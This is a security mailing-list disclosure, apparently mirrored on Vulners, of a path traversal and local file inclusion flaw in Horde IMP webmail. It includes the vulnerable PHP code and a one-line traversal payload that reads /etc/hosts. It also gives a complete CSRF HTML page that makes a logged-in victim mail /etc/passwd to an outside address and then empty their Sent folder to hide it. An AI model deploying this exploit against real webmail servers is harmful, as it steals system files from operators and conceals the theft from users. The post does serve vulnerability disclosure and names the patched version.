this is my first time sending to a mailing list so ive chosen
something easy. here goes:
Summary: Horde Groupware’s IMP Webmail solution contains a path
traversal/local file inclusion vulnerability which could be exploited
to escalate privileges or bypass authentication (through CSRF if
unauthenticated).
the vulnerability is in here:
} elseif (strcasecmp($node->tagName, 'IMG') === 0) {
/* Check for smileys. They live in the JS directory, under
* the base ckeditor directory, so search for that and replace
* with the filesystem information if found (Request
* #13051). Need to ignore other image links that may have
* been explicitly added by the user. */
$js_path = strval(Horde::url($registry->get('jsuri',
'horde'), true));
if (stripos($src, $js_path . '/ckeditor') === 0) {
$file = str_replace(
$js_path,
$registry->get('jsfs', 'horde'),
$src
);
if (is_readable($file)) {
$data_part = new Horde_Mime_Part();
$data_part->setContents(file_get_contents($file));
...
as seen, we control $file, which is just the src in <img src="">. to
get past the checks to hit our file_get_contents sink, we can just
satisfy the stripos check. our (elementary) exploit is thus:
--
<img src="https://webmail.foo.com/js/ckeditor/../../../../../../etc/hosts">
--
this is likely very chainable with any other existing primitive to
achieve rce on horde IMP. for example, heres an easy csrf chain:
--
<!DOCTYPE html>
<html>
<body>
<h1>yo</h1>
<script>
var p1 = new FormData();
p1.append('to', '[email protected]');
// land in spam
p1.append('subject', 'hai');
p1.append('html', '1');
p1.append('message',
'<html><body>bye<img
src="http://targ/horde/js/ckeditor/../../../../etc/passwd"></body></html>');
p1.append('identity', '0');
p1.append('priority', 'normal');
p1.append('request_read_receipt', '0');
p1.append('save_sent_mail', '1');
fetch('http://targ/horde/services/ajax.php/imp/sendMessage', {
method: 'POST',
body: p1,
credentials: 'include',
mode: 'no-cors'
})
.then(() => {
console.log("* bye");
setTimeout(() => {
var p2 = new FormData();
p2.append('mbox', 'U0VOVA'); // b64 SENT
// delete
fetch('http://targ/horde/services/ajax.php/imp/emptyMailbox', {
method: 'POST',
body: p2,
credentials: 'include',
mode: 'no-cors'
});
}, 2000);
});
</script>
</body>
</html>
--
PATCH:
update to horde imp 7.0.1 for the patch.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation